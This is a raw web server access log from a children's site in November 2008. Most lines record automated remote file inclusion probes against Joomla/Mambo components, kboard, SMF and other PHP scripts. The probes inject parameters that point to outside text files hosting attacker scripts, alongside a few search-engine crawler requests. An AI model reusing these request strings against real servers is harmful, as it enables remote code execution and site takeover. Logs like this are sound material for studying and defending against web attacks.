210.59.227.15 - - [21/Nov/2008:01:23:43 -0700] "GET /logs/access_log.old//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:23:48 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:23:50 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
61.8.3.74 - - [21/Nov/2008:01:24:36 -0700] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
64.1.215.165 - - [21/Nov/2008:01:24:49 -0700] "GET /ads/popupads/?N=A HTTP/1.0" 200 2418 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
72.46.126.214 - - [21/Nov/2008:01:25:26 -0700] "GET /phphtml.php?htmlclass_path=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
210.59.227.15 - - [21/Nov/2008:01:26:02 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:26:03 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
72.46.126.214 - - [21/Nov/2008:01:26:45 -0700] "GET /logs/access_log.old/phphtml.php?htmlclass_path=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:26:45 -0700] "GET /phphtml.php?htmlclass_path=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:26:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
219.85.63.226 - - [21/Nov/2008:01:27:44 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
219.85.63.226 - - [21/Nov/2008:01:27:44 -0700] "GET //component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
61.8.3.74 - - [21/Nov/2008:01:27:50 -0700] "GET /logs/access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:27:50 -0700] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:27:51 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
219.85.63.226 - - [21/Nov/2008:01:28:13 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
219.85.63.226 - - [21/Nov/2008:01:28:13 -0700] "GET //component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
61.8.3.74 - - [21/Nov/2008:01:28:26 -0700] "GET /logs/error_log.old//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
207.57.2.157 - - [21/Nov/2008:01:30:13 -0700] "GET /logs/access_log.old/phphtml.php?htmlclass_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
207.57.2.157 - - [21/Nov/2008:01:30:13 -0700] "GET /phphtml.php?htmlclass_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
207.57.2.157 - - [21/Nov/2008:01:30:13 -0700] "GET /logs/phphtml.php?htmlclass_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
72.30.142.247 - - [21/Nov/2008:01:30:57 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.247 - - [21/Nov/2008:01:30:58 -0700] "GET /oldcalendars/?S=A HTTP/1.0" 200 2201 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
150.164.65.65 - - [21/Nov/2008:01:37:08 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
70.84.182.98 - - [21/Nov/2008:01:37:09 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [21/Nov/2008:01:37:11 -0700] "GET /logs/access_log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [21/Nov/2008:01:37:11 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
208.111.154.16 - - [21/Nov/2008:01:38:13 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "-"
208.111.154.15 - - [21/Nov/2008:01:38:13 -0700] "GET / HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "-"
89.218.85.18 - - [21/Nov/2008:01:38:17 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [21/Nov/2008:01:38:17 -0700] "GET /logs/access_log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
89.218.85.18 - - [21/Nov/2008:01:38:17 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
72.46.126.214 - - [21/Nov/2008:01:38:54 -0700] "GET /logs/access_log/phphtml.php?htmlclass_path=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:39:36 -0700] "GET /logs/error_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
61.8.3.74 - - [21/Nov/2008:01:39:37 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:39:37 -0700] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
210.59.227.15 - - [21/Nov/2008:01:39:39 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:39:40 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
70.84.182.98 - - [21/Nov/2008:01:40:57 -0700] "GET /logs/access_log.old//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.85.149.242 - - [21/Nov/2008:01:42:33 -0700] "GET /logs/?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 200 1086 www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [21/Nov/2008:01:42:33 -0700] "GET /?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 200 1047 www.wnckids.com "-" "libwww-perl/5.819" "-"
70.84.182.98 - - [21/Nov/2008:01:43:00 -0700] "GET /logs/access_log%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
210.59.227.15 - - [21/Nov/2008:01:43:04 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:43:05 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
59.126.46.141 - - [21/Nov/2008:01:43:14 -0700] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
59.126.46.141 - - [21/Nov/2008:01:43:18 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
59.126.46.141 - - [21/Nov/2008:01:43:18 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
207.57.2.157 - - [21/Nov/2008:01:43:57 -0700] "GET /logs/access_log/phphtml.php?htmlclass_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
150.164.65.65 - - [21/Nov/2008:01:44:33 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
217.18.75.1 - - [21/Nov/2008:01:44:35 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
217.18.75.1 - - [21/Nov/2008:01:44:35 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
217.18.75.1 - - [21/Nov/2008:01:44:36 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
217.18.75.1 - - [21/Nov/2008:01:44:36 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
222.233.52.18 - - [21/Nov/2008:01:44:52 -0700] "GET /logs//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [21/Nov/2008:01:45:15 -0700] "GET /logs/access_log//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [21/Nov/2008:01:45:16 -0700] "GET /logs/access_log.old//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
210.59.227.15 - - [21/Nov/2008:01:45:59 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:46:00 -0700] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
193.47.80.39 - - [21/Nov/2008:01:46:41 -0700] "GET /pamperingparents.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "-"
200.49.155.60 - - [21/Nov/2008:01:46:58 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.49.155.60 - - [21/Nov/2008:01:46:58 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.49.155.60 - - [21/Nov/2008:01:46:58 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.49.155.60 - - [21/Nov/2008:01:46:58 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
70.38.54.118 - - [21/Nov/2008:01:47:46 -0700] "GET /logs/?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 200 1086 www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [21/Nov/2008:01:47:46 -0700] "GET /?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 200 1047 www.wnckids.com "-" "libwww-perl/5.814" "-"
87.106.245.44 - - [21/Nov/2008:01:48:52 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
83.149.69.60 - - [21/Nov/2008:01:49:18 -0700] "GET /logs/?custompluginfile[]=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 200 1086 www.wnckids.com "-" "libwww-perl/5.805" "-"
83.149.69.60 - - [21/Nov/2008:01:49:18 -0700] "GET /?custompluginfile[]=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 200 1047 www.wnckids.com "-" "libwww-perl/5.805" "-"
216.16.122.1 - - [21/Nov/2008:01:50:26 -0700] "GET /?custompluginfile[]=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 200 1047 www.wnckids.com "-" "libwww-perl/5.803" "-"
64.1.215.165 - - [21/Nov/2008:01:50:28 -0700] "GET /oldcalendars/_vti_cnf/?M=D HTTP/1.0" 200 2115 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
216.16.122.1 - - [21/Nov/2008:01:50:28 -0700] "GET /logs/?custompluginfile[]=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 200 1086 www.wnckids.com "-" "libwww-perl/5.803" "-"
74.52.215.26 - - [21/Nov/2008:01:51:37 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
74.52.215.26 - - [21/Nov/2008:01:51:37 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
74.52.215.26 - - [21/Nov/2008:01:52:07 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
74.52.215.26 - - [21/Nov/2008:01:52:07 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
61.8.3.74 - - [21/Nov/2008:01:52:11 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
210.59.227.15 - - [21/Nov/2008:01:52:13 -0700] "GET /logs/error_log.old//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
87.106.245.44 - - [21/Nov/2008:01:52:54 -0700] "GET /logs/access_log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:52:54 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:52:55 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:57:36 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:57:36 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:57:36 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:57:36 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
38.99.44.103 - - [21/Nov/2008:01:58:13 -0700] "GET /images/parks/_vti_cnf/?M=D HTTP/1.0" 200 1503 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
61.8.3.74 - - [21/Nov/2008:01:58:59 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:58:59 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
210.59.227.15 - - [21/Nov/2008:01:59:16 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:59:17 -0700] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
222.233.52.18 - - [21/Nov/2008:02:00:59 -0700] "GET /logs/access_log//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [21/Nov/2008:02:00:59 -0700] "GET /logs//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [21/Nov/2008:02:01:11 -0700] "GET /logs/access_log.old//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
193.47.80.39 - - [21/Nov/2008:02:02:21 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "-"
193.47.80.39 - - [21/Nov/2008:02:02:21 -0700] "GET /aboutus.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "-"
70.84.182.98 - - [21/Nov/2008:02:04:18 -0700] "GET /logs/access_log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [21/Nov/2008:02:04:19 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [21/Nov/2008:02:04:19 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
121.126.12.7 - - [21/Nov/2008:02:04:27 -0700] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
70.84.182.98 - - [21/Nov/2008:02:04:59 -0700] "GET /logs/access_log.old//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
61.8.3.74 - - [21/Nov/2008:02:05:16 -0700] "GET /logs/access_log.old//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:05:17 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:05:17 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
38.99.44.103 - - [21/Nov/2008:02:05:22 -0700] "GET /images/animalsinsects/_vti_cnf/?M=D HTTP/1.0" 200 656 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
87.106.245.44 - - [21/Nov/2008:02:08:33 -0700] "GET /logs/access_log.old//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
70.85.149.242 - - [21/Nov/2008:02:10:13 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [21/Nov/2008:02:10:13 -0700] "GET ///vwar/backup/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.38.54.118 - - [21/Nov/2008:02:10:22 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [21/Nov/2008:02:10:22 -0700] "GET /logs/access_log///vwar/backup/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [21/Nov/2008:02:10:22 -0700] "GET ///vwar/backup/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
195.137.143.11 - - [21/Nov/2008:02:11:44 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:11:44 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
210.245.226.28 - - [21/Nov/2008:02:13:12 -0700] "GET ///vwar/backup/errors.php?error=http://masla.su/image/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
210.245.226.28 - - [21/Nov/2008:02:13:12 -0700] "GET /logs///vwar/backup/errors.php?error=http://masla.su/image/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
